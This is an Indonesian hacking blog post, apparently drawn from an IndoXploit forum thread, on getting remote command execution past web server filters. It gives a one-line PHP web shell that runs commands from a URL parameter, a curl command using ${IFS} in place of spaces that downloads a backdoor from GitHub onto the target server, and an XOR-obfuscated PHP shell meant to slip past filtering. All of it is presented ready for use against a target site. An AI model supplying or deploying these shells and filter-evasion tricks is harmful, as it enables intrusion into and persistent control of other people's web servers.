Bypass RCE (Remote Code Execution) dengan One Line Command

Diambil dari sebuah thread pada grup IndoXploit dimana ketika melakukan RCE mendapatkan Error dengan HTTP ERROR CODE 500 ada beberapa teknik untuk melakukan Bypass RCE. Beberapa Teknik RCE Dibawah ini hanya berlaku untuk web yang menggunakan filtering (Space Filtering,Command Filtering,dll) dan bukan disable fitur

Bypass RCE (Remote Code Execution) dengan $_GET
Karna biasanya RCE menggunakan system() beberapa website mengguna block script atau semacamnya, sehinggan RCE tidak dapat dilakukan. Untuk mengatasinya kita dapat menggunakan command dibawah

<?=`$_GET[0]`?>

Untuk Penggunaannya seperti berikut

http://target.com/path/to/shell.php?0=command

 Bypass RCE (Remote Code Execution) dengan Curl One Line Command
Beberapa kasus ketika melakukan RCE menggunakan spasi payload tidak tereksekusi dan malah menampilkan error, untuk ini dapat menggunakan One Line Command seperti berikut

curl${IFS}https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php>0x.php

Upload Shell backdoor menggunakan command diatas

http://target.com/path/to/shell.php?0=curl${IFS}https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php>nakanosec.php
Dan Akses Shell Backdoor di

http://target.com/path/to/nakanosec.php 

Bypass RCE (Remote Code Execution) dengan Obfuscation/Obfuscated
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Dan Akses Shell Backdoor di

http://target.com/path/to/shell.php?0=command

Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.